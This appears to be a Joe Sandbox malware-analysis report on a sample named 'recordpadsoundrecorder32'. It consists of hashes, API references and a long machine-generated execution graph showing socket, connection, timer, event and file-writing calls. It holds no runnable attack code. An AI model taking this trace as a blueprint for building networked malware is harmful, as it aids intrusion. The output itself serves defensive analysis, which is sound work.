                                                                                      • Opcode ID: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                      • Instruction ID: 8d17195ec0ccff2424cf6b57804f20dfeb37273885bc82fd82189131503ce94b
                                                                                      • Opcode Fuzzy Hash: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                      • Instruction Fuzzy Hash: 3EB19EB4A01205DFDB14CF44CAD0A69BBA1FB88314F25C1AEDA596F3A2D735ED41CB84
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(?,00000000), ref: 00406083
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: $
                                                                                      • API String ID: 1807457897-3032137957
                                                                                      • Opcode ID: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                                                      • Instruction ID: 3e87ef9e1105c78bb2f85cebc7c09ea1e0cb28c4563d123519c4b9c13c46ffd4
                                                                                      • Opcode Fuzzy Hash: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                                                      • Instruction Fuzzy Hash: 0C414831004258AAEB119B54CD99BFB3FE9DB06704F1501F6D587FB1D3C23949648BAE
                                                                                      APIs
                                                                                      • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404AD8
                                                                                      • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B0C
                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B26
                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B3D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap$FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3499195154-0
                                                                                      • Opcode ID: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                      • Instruction ID: e332c3e7fbabb4a530177a7352d9393d0fbd82ec7ab2db7e11d44f19093e014a
                                                                                      • Opcode Fuzzy Hash: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                      • Instruction Fuzzy Hash: 611116B0201601DFC7219F19EE85E22BBB5FB84720711463AF292E65F0D771A845CF5C

                                                                                      Execution Graph

                                                                                      Execution Coverage:9.1%
                                                                                      Dynamic/Decrypted Code Coverage:84.5%
                                                                                      Signature Coverage:2.4%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:33
                                                                                      execution_graph
WSASetLastError connect 20069->20070 20071 2602ad8 20069->20071 20072 260a4b7 69 API calls 20070->20072 20073 2610ac0 Mailbox 68 API calls 20071->20073 20074 2602b07 20072->20074 20075 2602add 20073->20075 20074->20075 20076 2610ac0 Mailbox 68 API calls 20074->20076 20077 2610ac0 Mailbox 68 API calls 20075->20077 20076->20075 20078 2602b1b 20077->20078 20080 2610ac0 Mailbox 68 API calls 20078->20080 20083 2602b38 20078->20083 20080->20083 20082 2602b87 20082->18794 20083->20082 20147 2603027 20083->20147 20086 2610ac0 Mailbox 68 API calls 20086->20082 20088 2603548 __EH_prolog 20087->20088 20089 2603576 20088->20089 20090 2603557 20088->20090 20109 2602edd WSASetLastError WSASocketA 20089->20109 20091 2601996 68 API calls 20090->20091 20095 260355f 20091->20095 20094 26035ad CreateIoCompletionPort 20096 26035c5 GetLastError 20094->20096 20097 26035db 20094->20097 20095->18791 20099 2610ac0 Mailbox 68 API calls 20096->20099 20098 2610ac0 Mailbox 68 API calls 20097->20098 20100 26035d2 20098->20100 20099->20100 20101 2603626 20100->20101 20102 26035ef 20100->20102 20135 260dea1 20101->20135 20103 2610ac0 Mailbox 68 API calls 20102->20103 20104 2603608 20103->20104 20117 26029ee 20104->20117 20107 2603659 20108 2610ac0 Mailbox 68 API calls 20107->20108 20108->20095 20110 2610ac0 Mailbox 68 API calls 20109->20110 20111 2602f0a WSAGetLastError 20110->20111 20112 2602f21 20111->20112 20116 2602f41 20111->20116 20113 2602f27 setsockopt 20112->20113 20114 2602f3c 20112->20114 20113->20114 20115 2610ac0 Mailbox 68 API calls 20114->20115 20115->20116 20116->20094 20116->20095 20118 2602aad 20117->20118 20119 2602a0c 20117->20119 20120 2610ac0 Mailbox 68 API calls 20118->20120 20122 2602ab8 20118->20122 20121 2602a39 WSASetLastError closesocket 20119->20121 20125 2610ac0 Mailbox 68 API calls 20119->20125 20120->20122 20123 260a4b7 69 API calls 20121->20123 20122->20095 20124 2602a51 20123->20124 20124->20118 20127 2610ac0 Mailbox 68 API calls 20124->20127 20126 2602a21 
20125->20126 20139 2602f50 20126->20139 20130 2602a5c 20127->20130 20131 2602a7b ioctlsocket WSASetLastError closesocket 20130->20131 20132 2610ac0 Mailbox 68 API calls 20130->20132 20134 260a4b7 69 API calls 20131->20134 20133 2602a6e 20132->20133 20133->20118 20133->20131 20134->20118 20136 260deab __EH_prolog 20135->20136 20137 2613afc _Allocate 60 API calls 20136->20137 20138 260debf 20137->20138 20138->20107 20140 2602f70 WSASetLastError setsockopt 20139->20140 20141 2602f5b 20139->20141 20143 260a4b7 69 API calls 20140->20143 20142 2610ac0 Mailbox 68 API calls 20141->20142 20146 2602a36 20142->20146 20144 2602f9e 20143->20144 20145 2610ac0 Mailbox 68 API calls 20144->20145 20144->20146 20145->20146 20146->20121 20148 260303b 20147->20148 20149 260304d WSASetLastError select 20147->20149 20151 2610ac0 Mailbox 68 API calls 20148->20151 20150 260a4b7 69 API calls 20149->20150 20152 2603095 20150->20152 20154 2602b59 20151->20154 20153 2610ac0 Mailbox 68 API calls 20152->20153 20152->20154 20153->20154 20154->20082 20155 2602fb4 20154->20155 20156 2602fc0 20155->20156 20157 2602fd5 WSASetLastError getsockopt 20155->20157 20158 2610ac0 Mailbox 68 API calls 20156->20158 20159 260a4b7 69 API calls 20157->20159 20162 2602b7a 20158->20162 20160 260300f 20159->20160 20161 2610ac0 Mailbox 68 API calls 20160->20161 20160->20162 20161->20162 20162->20082 20162->20086 20170 26253a0 20163->20170 20165 26032b5 RtlEnterCriticalSection 20166 2610ac0 Mailbox 68 API calls 20165->20166 20167 26032d6 20166->20167 20171 2603307 20167->20171 20170->20165 20173 2603311 __EH_prolog 20171->20173 20174 2603350 20173->20174 20183 2607e30 20173->20183 20187 260239d 20174->20187 20178 2610ac0 Mailbox 68 API calls 20180 260337c 20178->20180 20181 2602d39 71 API calls 20180->20181 20182 2603390 20181->20182 20193 2607dd9 20182->20193 20186 2607e3e 20183->20186 20184 2607eb4 20184->20173 20186->20184 20197 2608995 20186->20197 20191 26023ab 20187->20191 20188 2602417 20188->20178 20188->20182 
20189 26023c1 PostQueuedCompletionStatus 20190 26023da RtlEnterCriticalSection 20189->20190 20189->20191 20190->20191 20191->20188 20191->20189 20192 26023f8 InterlockedExchange RtlLeaveCriticalSection 20191->20192 20192->20191 20195 2607dde 20193->20195 20194 26032ee RtlLeaveCriticalSection 20194->18809 20195->20194 20213 2601e7f 20195->20213 20198 26089bf 20197->20198 20199 2607dd9 68 API calls 20198->20199 20200 2608a05 20199->20200 20201 2608a2c 20200->20201 20203 260a222 20200->20203 20201->20184 20204 260a23c 20203->20204 20205 260a22c 20203->20205 20204->20201 20205->20204 20208 260fae0 20205->20208 20209 2612483 std::exception::exception 59 API calls 20208->20209 20210 260faf8 20209->20210 20211 261450a __CxxThrowException@8 RaiseException 20210->20211 20212 260fb0d 20211->20212 20214 2610ac0 Mailbox 68 API calls 20213->20214 20215 2601e90 20214->20215 20215->20195 20226 261222b 20216->20226 20219 2612355 20220 2615e0b __fptostr 59 API calls 20219->20220 20221 261235a 20220->20221 20222 2614ea5 __fptostr 9 API calls 20221->20222 20224 2612365 ___ascii_stricmp 20222->20224 20223 261592a 66 API calls __tolower_l 20225 261236c 20223->20225 20224->18820 20225->20223 20225->20224 20227 261223c 20226->20227 20233 2612289 20226->20233 20228 2615c0a __beginthreadex 59 API calls 20227->20228 20229 2612242 20228->20229 20230 2612269 20229->20230 20234 261516f 20229->20234 20230->20233 20249 26154f1 20230->20249 20233->20219 20233->20225 20235 261517b ___DllMainCRTStartup 20234->20235 20236 2615c0a __beginthreadex 59 API calls 20235->20236 20237 2615184 20236->20237 20238 26151b3 20237->20238 20240 2615197 20237->20240 20239 261889d __lock 59 API calls 20238->20239 20241 26151ba 20239->20241 20242 2615c0a __beginthreadex 59 API calls 20240->20242 20261 26151ef 20241->20261 20243 261519c 20242->20243 20246 26151aa ___DllMainCRTStartup 20243->20246 20248 26183ef __amsg_exit 59 API calls 20243->20248 20246->20230 20248->20246 20250 26154fd ___DllMainCRTStartup 
20249->20250 20251 2615c0a __beginthreadex 59 API calls 20250->20251 20252 2615507 20251->20252 20253 261889d __lock 59 API calls 20252->20253 20257 2615519 20252->20257 20254 2615537 20253->20254 20259 2612f24 _free 59 API calls 20254->20259 20260 2615564 20254->20260 20256 26183ef __amsg_exit 59 API calls 20258 2615527 ___DllMainCRTStartup 20256->20258 20257->20256 20257->20258 20258->20233 20259->20260 20269 261558e 20260->20269 20262 26151fa ___addlocaleref ___removelocaleref 20261->20262 20264 26151ce 20261->20264 20263 2614f75 ___freetlocinfo 59 API calls 20262->20263 20262->20264 20263->20264 20265 26151e6 20264->20265 20268 2618a07 RtlLeaveCriticalSection 20265->20268 20267 26151ed 20267->20243 20268->20267 20272 2618a07 RtlLeaveCriticalSection 20269->20272 20271 2615595 20271->20257 20272->20271 20274 261283b 20273->20274 20275 2615e0b __fptostr 59 API calls 20274->20275 20276 261284b _strlen 20274->20276 20277 2612840 20275->20277 20276->18844 20278 2614ea5 __fptostr 9 API calls 20277->20278 20278->20276 20280 260dfb8 __EH_prolog 20279->20280 20281 2613afc _Allocate 60 API calls 20280->20281 20282 260dfcf 20281->20282 20282->18863 20284 260a6c0 GetProcessHeap HeapFree 20283->20284 20284->18870 20286 261222b _LocaleUpdate::_LocaleUpdate 59 API calls 20285->20286 20287 2616075 20286->20287 20288 2615e0b __fptostr 59 API calls 20287->20288 20289 261607a 20288->20289 20290 2616b4b 20289->20290 20307 261609a __output_l __aulldvrm _strlen 20289->20307 20330 2619de1 20289->20330 20291 2615e0b __fptostr 59 API calls 20290->20291 20292 2616b50 20291->20292 20295 2614ea5 __fptostr 9 API calls 20292->20295 20294 2616b25 20296 26144fb __crtLCMapStringA_stat 6 API calls 20294->20296 20295->20294 20297 2612426 20296->20297 20297->18882 20309 2615eb1 20297->20309 20299 2616b80 79 API calls _write_multi_char 20299->20307 20300 2616703 RtlDecodePointer 20300->20307 20301 2616bc8 79 API calls _write_multi_char 20301->20307 20302 2612f24 _free 59 API calls 20302->20307 
20303 2618a64 __malloc_crt 59 API calls 20303->20307 20304 2616766 RtlDecodePointer 20304->20307 20305 261678b RtlDecodePointer 20305->20307 20306 261fa94 61 API calls __cftof 20306->20307 20307->20290 20307->20294 20307->20299 20307->20300 20307->20301 20307->20302 20307->20303 20307->20304 20307->20305 20307->20306 20308 2616bf4 79 API calls _write_string 20307->20308 20337 261dcbe 20307->20337 20308->20307 20310 2619de1 __filbuf 59 API calls 20309->20310 20311 2615ebf 20310->20311 20312 2615ee1 20311->20312 20313 2615eca 20311->20313 20315 2615ee6 20312->20315 20324 2615ef3 __flsbuf 20312->20324 20314 2615e0b __fptostr 59 API calls 20313->20314 20323 2615ecf 20314->20323 20316 2615e0b __fptostr 59 API calls 20315->20316 20316->20323 20317 2615f4d 20318 2615fd1 20317->20318 20319 2615f57 20317->20319 20320 2619e05 __write 79 API calls 20318->20320 20321 2615f71 20319->20321 20326 2615f88 20319->20326 20320->20323 20352 2619e05 20321->20352 20323->18882 20324->20317 20324->20323 20327 2615f42 20324->20327 20340 261f752 20324->20340 20326->20323 20380 261f7a6 20326->20380 20327->20317 20349 261f915 20327->20349 20331 2619e00 20330->20331 20332 2619deb 20330->20332 20331->20307 20333 2615e0b __fptostr 59 API calls 20332->20333 20334 2619df0 20333->20334 20335 2614ea5 __fptostr 9 API calls 20334->20335 20336 2619dfb 20335->20336 20336->20307 20338 261222b _LocaleUpdate::_LocaleUpdate 59 API calls 20337->20338 20339 261dccf 20338->20339 20339->20307 20341 261f76a 20340->20341 20342 261f75d 20340->20342 20345 261f776 20341->20345 20346 2615e0b __fptostr 59 API calls 20341->20346 20343 2615e0b __fptostr 59 API calls 20342->20343 20344 261f762 20343->20344 20344->20327 20345->20327 20347 261f797 20346->20347 20348 2614ea5 __fptostr 9 API calls 20347->20348 20348->20344 20350 2618a64 __malloc_crt 59 API calls 20349->20350 20351 261f92a 20350->20351 20351->20317 20353 2619e11 ___DllMainCRTStartup 20352->20353 20354 2619e35 20353->20354 20355 2619e1e 20353->20355 20357 
2619ed4 20354->20357 20359 2619e49 20354->20359 20356 2615dd7 __commit 59 API calls 20355->20356 20358 2619e23 20356->20358 20360 2615dd7 __commit 59 API calls 20357->20360 20361 2615e0b __fptostr 59 API calls 20358->20361 20362 2619e71 20359->20362 20363 2619e67 20359->20363 20364 2619e6c 20360->20364 20374 2619e2a ___DllMainCRTStartup 20361->20374 20405 2620c37 20362->20405 20365 2615dd7 __commit 59 API calls 20363->20365 20368 2615e0b __fptostr 59 API calls 20364->20368 20365->20364 20367 2619e77 20369 2619e8a 20367->20369 20370 2619e9d 20367->20370 20371 2619ee0 20368->20371 20414 2619ef4 20369->20414 20375 2615e0b __fptostr 59 API calls 20370->20375 20373 2614ea5 __fptostr 9 API calls 20371->20373 20373->20374 20374->20323 20377 2619ea2 20375->20377 20376 2619e96 20473 2619ecc 20376->20473 20378 2615dd7 __commit 59 API calls 20377->20378 20378->20376 20381 261f7b2 ___DllMainCRTStartup 20380->20381 20382 261f7c3 20381->20382 20383 261f7db 20381->20383 20384 2615dd7 __commit 59 API calls 20382->20384 20385 261f880 20383->20385 20390 261f810 20383->20390 20386 261f7c8 20384->20386 20387 2615dd7 __commit 59 API calls 20385->20387 20388 2615e0b __fptostr 59 API calls 20386->20388 20389 261f885 20387->20389 20399 261f7d0 ___DllMainCRTStartup 20388->20399 20391 2615e0b __fptostr 59 API calls 20389->20391 20392 2620c37 ___lock_fhandle 60 API calls 20390->20392 20393 261f88d 20391->20393 20394 261f816 20392->20394 20395 2614ea5 __fptostr 9 API calls 20393->20395 20396 261f844 20394->20396 20397 261f82c 20394->20397 20395->20399 20400 2615e0b __fptostr 59 API calls 20396->20400 20398 261f8a2 __lseeki64_nolock 61 API calls 20397->20398 20401 261f83b 20398->20401 20399->20323 20402 261f849 20400->20402 20506 261f878 20401->20506 20403 2615dd7 __commit 59 API calls 20402->20403 20403->20401 20406 2620c43 ___DllMainCRTStartup 20405->20406 20407 2620c92 RtlEnterCriticalSection 20406->20407 20408 261889d __lock 59 API calls 20406->20408 20409 2620cb8 ___DllMainCRTStartup 
20407->20409 20410 2620c68 20408->20410 20409->20367 20411 2620c80 20410->20411 20412 26191bc __ioinit InitializeCriticalSectionAndSpinCount 20410->20412 20476 2620cbc 20411->20476 20412->20411 20415 2619f01 __write_nolock 20414->20415 20416 2619f40 20415->20416 20417 2619f5f 20415->20417 20448 2619f35 20415->20448 20419 2615dd7 __commit 59 API calls 20416->20419 20420 2619fb7 20417->20420 20421 2619f9b 20417->20421 20418 26144fb __crtLCMapStringA_stat 6 API calls 20422 261a755 20418->20422 20423 2619f45 20419->20423 20432 2619fd0 20420->20432 20480 261f8a2 20420->20480 20424 2615dd7 __commit 59 API calls 20421->20424 20422->20376 20425 2615e0b __fptostr 59 API calls 20423->20425 20426 2619fa0 20424->20426 20427 2619f4c 20425->20427 20430 2615e0b __fptostr 59 API calls 20426->20430 20431 2614ea5 __fptostr 9 API calls 20427->20431 20429 261f752 __write_nolock 59 API calls 20433 2619fde 20429->20433 20434 2619fa7 20430->20434 20431->20448 20432->20429 20435 261a337 20433->20435 20439 2615c0a __beginthreadex 59 API calls 20433->20439 20438 2614ea5 __fptostr 9 API calls 20434->20438 20436 261a355 20435->20436 20437 261a6ca WriteFile 20435->20437 20440 261a479 20436->20440 20446 261a36b 20436->20446 20441 261a32a GetLastError 20437->20441 20450 261a2f7 20437->20450 20438->20448 20442 261a00a GetConsoleMode 20439->20442 20452 261a484 20440->20452 20466 261a56e 20440->20466 20441->20450 20442->20435 20444 261a049 20442->20444 20443 261a703 20443->20448 20449 2615e0b __fptostr 59 API calls 20443->20449 20444->20435 20445 261a059 GetConsoleCP 20444->20445 20445->20443 20471 261a088 20445->20471 20446->20443 20447 261a3da WriteFile 20446->20447 20446->20450 20447->20441 20447->20446 20448->20418 20453 261a731 20449->20453 20450->20443 20450->20448 20451 261a457 20450->20451 20454 261a462 20451->20454 20455 261a6fa 20451->20455 20452->20443 20452->20450 20457 261a4e9 WriteFile 20452->20457 20458 2615dd7 __commit 59 API calls 20453->20458 20459 2615e0b __fptostr 59 API calls 
20454->20459 20460 2615dea __dosmaperr 59 API calls 20455->20460 20456 261a5e3 WideCharToMultiByte 20456->20441 20456->20466 20457->20441 20457->20452 20458->20448 20461 261a467 20459->20461 20460->20448 20463 2615dd7 __commit 59 API calls 20461->20463 20462 261a632 WriteFile 20465 261a685 GetLastError 20462->20465 20462->20466 20463->20448 20465->20466 20466->20443 20466->20450 20466->20456 20466->20462 20467 261ffba 61 API calls __write_nolock 20467->20471 20468 2621006 WriteConsoleW CreateFileW __putwch_nolock 20468->20471 20469 261a171 WideCharToMultiByte 20469->20450 20470 261a1ac WriteFile 20469->20470 20470->20441 20470->20471 20471->20441 20471->20450 20471->20467 20471->20468 20471->20469 20472 261a206 WriteFile 20471->20472 20489 261dcf8 20471->20489 20472->20441 20472->20471 20505 2620fe0 RtlLeaveCriticalSection 20473->20505 20475 2619ed2 20475->20374 20479 2618a07 RtlLeaveCriticalSection 20476->20479 20478 2620cc3 20478->20407 20479->20478 20492 2620ef4 20480->20492 20482 261f8b2 20483 261f8cb SetFilePointerEx 20482->20483 20484 261f8ba 20482->20484 20486 261f8e3 GetLastError 20483->20486 20487 261f8bf 20483->20487 20485 2615e0b __fptostr 59 API calls 20484->20485 20485->20487 20488 2615dea __dosmaperr 59 API calls 20486->20488 20487->20432 20488->20487 20490 261dcbe __isleadbyte_l 59 API calls 20489->20490 20491 261dd05 20490->20491 20491->20471 20493 2620eff 20492->20493 20495 2620f14 20492->20495 20494 2615dd7 __commit 59 API calls 20493->20494 20497 2620f04 20494->20497 20496 2615dd7 __commit 59 API calls 20495->20496 20500 2620f39 20495->20500 20498 2620f43 20496->20498 20499 2615e0b __fptostr 59 API calls 20497->20499 20501 2615e0b __fptostr 59 API calls 20498->20501 20502 2620f0c 20499->20502 20500->20482 20503 2620f4b 20501->20503 20502->20482 20504 2614ea5 __fptostr 9 API calls 20503->20504 20504->20502 20505->20475 20509 2620fe0 RtlLeaveCriticalSection 20506->20509 20508 261f87e 20508->20399 20509->20508 20510->18885 20512 260e2e8 __EH_prolog 
20511->20512 20513 2613afc _Allocate 60 API calls 20512->20513 20514 260e2f1 20513->20514 20515 2601bfa RtlEnterCriticalSection 20514->20515 20517 260e4ff 20514->20517 20515->18890 20518 260e509 __EH_prolog 20517->20518 20521 26026db RtlEnterCriticalSection 20518->20521 20520 260e55f 20520->20515 20522 2602728 CreateWaitableTimerA 20521->20522 20523 260277e 20521->20523 20525 2602738 GetLastError 20522->20525 20526 260275b SetWaitableTimer 20522->20526 20524 26027d5 RtlLeaveCriticalSection 20523->20524 20527 2613afc _Allocate 60 API calls 20523->20527 20524->20520 20528 2610ac0 Mailbox 68 API calls 20525->20528 20526->20523 20529 260278a 20527->20529 20530 2602745 20528->20530 20532 2613afc _Allocate 60 API calls 20529->20532 20536 26027c8 20529->20536 20565 2601712 20530->20565 20534 26027a9 20532->20534 20537 2601cf8 CreateEventA 20534->20537 20571 2607db1 20536->20571 20538 2601d52 CreateEventA 20537->20538 20539 2601d23 GetLastError 20537->20539 20540 2601d6b GetLastError 20538->20540 20557 2601d96 20538->20557 20542 2601d33 20539->20542 20545 2601d7b 20540->20545 20541 2613369 __beginthreadex 201 API calls 20543 2601db6 20541->20543 20544 2610ac0 Mailbox 68 API calls 20542->20544 20546 2601dc6 GetLastError 20543->20546 20547 2601e0d 20543->20547 20548 2601d3c 20544->20548 20549 2610ac0 Mailbox 68 API calls 20545->20549 20554 2601dd8 20546->20554 20552 2601e11 WaitForSingleObject FindCloseChangeNotification 20547->20552 20553 2601e1d 20547->20553 20550 2601712 60 API calls 20548->20550 20551 2601d84 20549->20551 20555 2601d4e 20550->20555 20556 2601712 60 API calls 20551->20556 20552->20553 20553->20536 20558 2601ddc CloseHandle 20554->20558 20559 2601ddf 20554->20559 20555->20538 20556->20557 20557->20541 20558->20559 20560 2601de9 CloseHandle 20559->20560 20561 2601dee 20559->20561 20560->20561 20562 2610ac0 Mailbox 68 API calls 20561->20562 20563 2601dfb 20562->20563 20564 2601712 60 API calls 20563->20564 20564->20547 20566 260171c __EH_prolog 20565->20566 
20567 260173e 20566->20567 20568 2601815 Mailbox 59 API calls 20566->20568 20567->20526 20569 2601732 20568->20569 20574 260a450 20569->20574 20572 2607dcd 20571->20572 20573 2607dbe CloseHandle 20571->20573 20572->20524 20573->20572 20575 260a45a __EH_prolog 20574->20575 20582 260c9b5 20575->20582 20579 260a47b 20580 261450a __CxxThrowException@8 RaiseException 20579->20580 20581 260a489 20580->20581 20583 260b1dc std::bad_exception::bad_exception 60 API calls 20582->20583 20584 260a46d 20583->20584 20585 260c9f1 20584->20585 20586 260c9fb __EH_prolog 20585->20586 20589 260b18b 20586->20589 20588 260ca2a Mailbox 20588->20579 20590 260b195 __EH_prolog 20589->20590 20591 260b1dc std::bad_exception::bad_exception 60 API calls 20590->20591 20592 260b1a6 Mailbox 20591->20592 20592->20588 20604 26030ae WSASetLastError 20593->20604 20596 26030ae 71 API calls 20597 2603c90 20596->20597 20598 26016ae 20597->20598 20599 26016b8 __EH_prolog 20598->20599 20600 2601701 20599->20600 20601 2612483 std::exception::exception 59 API calls 20599->20601 20600->18739 20602 26016dc 20601->20602 20603 260a450 60 API calls 20602->20603 20603->20600 20605 26030ec WSAStringToAddressA 20604->20605 20606 26030ce 20604->20606 20607 260a4b7 69 API calls 20605->20607 20606->20605 20608 26030d3 20606->20608 20609 2603114 20607->20609 20610 2610ac0 Mailbox 68 API calls 20608->20610 20611 2603154 20609->20611 20617 260311e _memcmp 20609->20617 20619 26030d8 20610->20619 20612 2603135 20611->20612 20614 2610ac0 Mailbox 68 API calls 20611->20614 20613 2603193 20612->20613 20615 2610ac0 Mailbox 68 API calls 20612->20615 20618 2610ac0 Mailbox 68 API calls 20613->20618 20613->20619 20614->20612 20615->20613 20616 2610ac0 Mailbox 68 API calls 20616->20612 20617->20612 20617->20616 20618->20619 20619->20596 20619->20597 20621 2603bdd __EH_prolog 20620->20621 20622 2603bfe htonl htonl 20621->20622 20632 2612467 20621->20632 20622->18905 20627 2603c20 __EH_prolog 20626->20627 20628 2603c41 20627->20628 
20629 2612467 std::bad_exception::bad_exception 59 API calls 20627->20629 20628->18905 20630 2603c35 20629->20630 20631 260a605 60 API calls 20630->20631 20631->20628 20633 2612483 std::exception::exception 59 API calls 20632->20633 20634 2603bf2 20633->20634 20635 260a605 20634->20635 20636 260a60f __EH_prolog 20635->20636 20643 260cb28 20636->20643 20640 260a62a 20641 261450a __CxxThrowException@8 RaiseException 20640->20641 20642 260a638 20641->20642 20650 261244c 20643->20650 20646 260cb64 20647 260cb6e __EH_prolog 20646->20647 20653 260b4fa 20647->20653 20649 260cb9d Mailbox 20649->20640 20651 26124c3 std::exception::exception 59 API calls 20650->20651 20652 260a61c 20651->20652 20652->20646 20654 260b504 __EH_prolog 20653->20654 20655 261244c std::bad_exception::bad_exception 59 API calls 20654->20655 20656 260b515 Mailbox 20655->20656 20656->20649 20658 2603770 20657->20658 20659 2603755 InterlockedCompareExchange 20657->20659 20661 2610ac0 Mailbox 68 API calls 20658->20661 20659->20658 20660 2603765 20659->20660 20662 26032ab 78 API calls 20660->20662 20663 2603779 20661->20663 20662->20658 20664 26029ee 76 API calls 20663->20664 20665 260378e 20664->20665 20665->18909 20695 261365d 20666->20695 20668 26053c8 20668->18919 20669 26138b6 20668->20669 20670 26138c2 ___DllMainCRTStartup 20669->20670 20671 26138e0 20670->20671 20672 26138f8 20670->20672 20674 26138f0 ___DllMainCRTStartup 20670->20674 20673 2615e0b __fptostr 59 API calls 20671->20673 20837 26197a2 20672->20837 20676 26138e5 20673->20676 20674->18921 20678 2614ea5 __fptostr 9 API calls 20676->20678 20678->20674 20683 2613a40 ___DllMainCRTStartup 20682->20683 20684 2613a54 20683->20684 20685 2613a6c 20683->20685 20686 2615e0b __fptostr 59 API calls 20684->20686 20688 26197a2 __lock_file 60 API calls 20685->20688 20694 2613a64 ___DllMainCRTStartup 20685->20694 20687 2613a59 20686->20687 20689 2614ea5 __fptostr 9 API calls 20687->20689 20690 2613a7e 20688->20690 20689->20694 20864 26139c8 
20690->20864 20694->18919 20698 2613669 ___DllMainCRTStartup 20695->20698 20696 261367b 20697 2615e0b __fptostr 59 API calls 20696->20697 20699 2613680 20697->20699 20698->20696 20700 26136a8 20698->20700 20701 2614ea5 __fptostr 9 API calls 20699->20701 20714 2619878 20700->20714 20711 261368b ___DllMainCRTStartup @_EH4_CallFilterFunc@8 20701->20711 20703 26136ad 20704 26136c3 20703->20704 20705 26136b6 20703->20705 20706 26136ec 20704->20706 20707 26136cc 20704->20707 20708 2615e0b __fptostr 59 API calls 20705->20708 20729 2619997 20706->20729 20709 2615e0b __fptostr 59 API calls 20707->20709 20708->20711 20709->20711 20711->20668 20715 2619884 ___DllMainCRTStartup 20714->20715 20716 261889d __lock 59 API calls 20715->20716 20722 2619892 20716->20722 20717 261990d 20719 2618a64 __malloc_crt 59 API calls 20717->20719 20721 2619914 20719->20721 20720 2619983 ___DllMainCRTStartup 20720->20703 20725 26191bc __ioinit InitializeCriticalSectionAndSpinCount 20721->20725 20727 2619906 20721->20727 20722->20717 20723 2618925 __mtinitlocknum 59 API calls 20722->20723 20722->20727 20749 26197e1 20722->20749 20754 261984b 20722->20754 20723->20722 20726 261993a RtlEnterCriticalSection 20725->20726 20726->20727 20759 261998e 20727->20759 20738 26199b4 20729->20738 20730 26199c8 20732 2615e0b __fptostr 59 API calls 20730->20732 20731 2619b6f 20731->20730 20735 2619bcb 20731->20735 20733 26199cd 20732->20733 20734 2614ea5 __fptostr 9 API calls 20733->20734 20736 26136f7 20734->20736 20770 26207e0 20735->20770 20746 2613719 20736->20746 20738->20730 20738->20731 20764 26207fe 20738->20764 20743 262092d __openfile 59 API calls 20744 2619b87 20743->20744 20744->20731 20745 262092d __openfile 59 API calls 20744->20745 20745->20731 20830 2619811 20746->20830 20748 261371f 20748->20711 20750 2619802 RtlEnterCriticalSection 20749->20750 20751 26197ec 20749->20751 20750->20722 20752 261889d __lock 59 API calls 20751->20752 20753 26197f5 20752->20753 20753->20722 20755 2619859 
20754->20755 20756 261986c RtlLeaveCriticalSection 20754->20756 20762 2618a07 RtlLeaveCriticalSection 20755->20762 20756->20722 20758 2619869 20758->20722 20763 2618a07 RtlLeaveCriticalSection 20759->20763 20761 2619995 20761->20720 20762->20758 20763->20761 20773 2620816 20764->20773 20766 2619b35 20766->20730 20767 262092d 20766->20767 20781 2620945 20767->20781 20769 2619b68 20769->20731 20769->20743 20788 26206c9 20770->20788 20772 26207f9 20772->20736 20774 262082b 20773->20774 20780 2620824 20773->20780 20775 261222b _LocaleUpdate::_LocaleUpdate 59 API calls 20774->20775 20776 2620838 20775->20776 20777 2615e0b __fptostr 59 API calls 20776->20777 20776->20780 20778 262086b 20777->20778 20779 2614ea5 __fptostr 9 API calls 20778->20779 20779->20780 20780->20766 20782 261222b _LocaleUpdate::_LocaleUpdate 59 API calls 20781->20782 20784 2620958 20782->20784 20783 262096d 20783->20769 20784->20783 20785 2615e0b __fptostr 59 API calls 20784->20785 20786 2620999 20785->20786 20787 2614ea5 __fptostr 9 API calls 20786->20787 20787->20783 20790 26206d5 ___DllMainCRTStartup 20788->20790 20789 26206eb 20791 2615e0b __fptostr 59 API calls 20789->20791 20790->20789 20793 2620721 20790->20793 20792 26206f0 20791->20792 20794 2614ea5 __fptostr 9 API calls 20792->20794 20799 2620792 20793->20799 20798 26206fa ___DllMainCRTStartup 20794->20798 20798->20772 20808 26181e6 20799->20808 20801 262073d 20804 2620766 20801->20804 20802 26207a6 20802->20801 20803 2612f24 _free 59 API calls 20802->20803 20803->20801 20805 2620790 20804->20805 20806 262076c 20804->20806 20805->20798 20829 2620fe0 RtlLeaveCriticalSection 20806->20829 20809 26181f3 20808->20809 20810 2618209 20808->20810 20811 2615e0b __fptostr 59 API calls 20809->20811 20810->20809 20814 2618210 ___crtIsPackagedApp 20810->20814 20812 26181f8 20811->20812 